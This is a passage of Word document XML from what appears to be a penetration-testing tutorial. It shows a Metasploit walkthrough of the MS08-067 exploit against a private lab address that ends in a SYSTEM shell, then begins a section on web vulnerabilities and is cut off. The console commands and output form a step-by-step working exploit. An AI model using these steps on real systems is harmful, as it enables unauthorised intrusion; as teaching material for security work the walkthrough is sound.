    <w:p w14:paraId="14F18F7A" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  This module exploits a parsing flaw in the path canonicalization </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219FEFC" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  code of NetAPI32.dll through the Server Service. This module is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999AC39" w14:textId="77777777" w:rsidR="0064649B" w:rsidRPr="00B616D6" w:rsidRDefault="00AF5FEA" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="0064649B" w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923F70D" w14:textId="0F6966CE" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C994F9" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764F9FD" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  https://cvedetails.com/cve/CVE-2008-4250/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7172F" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  OSVDB (49243)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1295C" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  https://technet.microsoft.com/en-us/library/security/MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AFC82" w14:textId="47649E91" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414CEAB" w14:textId="77777777" w:rsidR="00A17A94" w:rsidRDefault="00A17A94" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313D5A7C" w14:textId="1BC1C7A5" w:rsidR="00AF5FEA" w:rsidRPr="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then, look for the available payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D65FE24" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD368BF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75662DAB" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2E17E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>===================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1A006" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2224ECC2" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name                                                Disclosure Date  Rank    Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B9B80" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----                                                ---------------  ----    -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A97336" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   generic/custom                                                       normal  Custom Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B5C63E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   generic/debug_trap                                                   normal  Generic x86 Debug Trap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38831A61" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551AB96A" w14:textId="654DDD54" w:rsidR="00AF5FEA" w:rsidRPr="00B616D6" w:rsidRDefault="00B616D6" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9DE3F" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFEE7A" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9AD927" w14:textId="467C7878" w:rsidR="00AF5FEA" w:rsidRDefault="00B616D6" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D18195F" w14:textId="77777777" w:rsidR="00A17A94" w:rsidRDefault="00A17A94" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD66C54" w14:textId="24FCB0D1" w:rsidR="00AF5FEA" w:rsidRPr="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Set parameters and payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78896F7A" w14:textId="01019ECE" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(windows/smb/ms08_067_netapi) &gt; set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B869202" w14:textId="4D39811E" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RHOST =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C25C8" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75620EF8" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; set PAYLOAD windows/shell/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE52B77" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; windows/shell/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1594E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738C06CF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE2E9B" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157ED072" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F5A9D" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11141187" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F12F60" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B34CB8" w14:textId="5A117803" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOST    </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D92F654" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00B2ED" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD3A11" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D095D57" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4EB129" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (windows/shell/bind_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EF7AF1" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424C2B92" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F304678" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C5FE7" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C819ED" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297806C" w14:textId="0D2C352E" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOST     </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    no        The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69269B94" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092B6FA2" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62665EC9" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F230F" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5300A85A" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B475D7C" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA4140" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0620F8" w14:textId="0DC898B2" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E580DA9" w14:textId="77777777" w:rsidR="00A17A94" w:rsidRDefault="00A17A94" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6396A7B9" w14:textId="306CBB41" w:rsidR="00AF5FEA" w:rsidRPr="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Some exploit</w:t>
      </w:r>
      <w:r w:rsidR="00804F65">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have the check feature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092BB971" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75D461" w14:textId="60A14C36" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r>
        <w:t>:445 The target is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C616D25" w14:textId="39E3CD49" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247EB060" w14:textId="77777777" w:rsidR="00A17A94" w:rsidRDefault="00A17A94" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734737BE" w14:textId="5A5FB3B9" w:rsidR="00AF5FEA" w:rsidRPr="00AF5FEA" w:rsidRDefault="003C5BE8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Finally</w:t>
      </w:r>
      <w:r w:rsidR="00AF5FEA">
        <w:t>, run the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A51177" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779BC0B8" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3D3F6B" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Started bind handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6A6FE" w14:textId="35E18BEF" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r>
        <w:t>:445 - Automatically detecting the target...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C147E" w14:textId="77777777" w:rsidR="0064649B" w:rsidRPr="00B616D6" w:rsidRDefault="0064649B" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF487A3" w14:textId="152AF473" w:rsidR="00AF5FEA" w:rsidRDefault="0064649B" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF5FEA">
        <w:t>[*] Command shell session 3 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r w:rsidR="00AF5FEA">
        <w:t xml:space="preserve">:38579 -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r w:rsidR="00AF5FEA">
        <w:t>:4444) at 2018-06-27 09:13:54 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32044804" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694B8616" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Windows [Version 5.2.3790]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163E285" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>(C) Copyright 1985-2003 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B997FC" w14:textId="32064A14" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0877EF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\WINDOWS\system32&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE0069" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BC03A" w14:textId="034BDCF4" w:rsidR="00A17A94" w:rsidRDefault="00AF5FEA" w:rsidP="00A17A94">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5D522" w14:textId="1C2E28DF" w:rsidR="00B616D6" w:rsidRDefault="00B616D6" w:rsidP="00A17A94">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7EA47" w14:textId="4E6887AD" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting</w:t>
      </w:r>
      <w:r w:rsidR="00442017">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA31DE" w14:textId="0426ECCA" w:rsidR="00AD4D84" w:rsidRDefault="00AD4D84" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4D84">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb applications have become more and more complex over the last two decades. They provide people with functionalities like searching, posting and upload</w:t>
      </w:r>
      <w:r w:rsidR="00A17A94">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t>. Web applications manipulate critical information</w:t>
      </w:r>
      <w:r w:rsidR="001E3210">
        <w:t xml:space="preserve"> including financial data, medical records, national security data, etc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and securing them has become incredibly important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475EBFD" w14:textId="26F4C3B1" w:rsidR="001E3210" w:rsidRDefault="002E2481" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>An a</w:t>
      </w:r>
      <w:r w:rsidR="001E3210">
        <w:t xml:space="preserve">pplication vulnerability could provide the mean </w:t>
      </w:r>
      <w:r w:rsidR="0032531B">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="001E3210">
        <w:t xml:space="preserve"> an attacker to breach protections and to gain access to the company’s network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFA730" w14:textId="0921EE59" w:rsidR="002E5652" w:rsidRDefault="002E5652" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The OWASP Top 10 project publish</w:t>
      </w:r>
      <w:r w:rsidR="000E69A4">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> every year the top 10 web vulnerabilities. In 2017, injection is at the first position (and already was in 2010),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA11EBD" w14:textId="15708EA5" w:rsidR="002E3D1D" w:rsidRPr="00AD4D84" w:rsidRDefault="002E3D1D" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal </w:t>
      </w:r>
      <w:r w:rsidR="00796061">
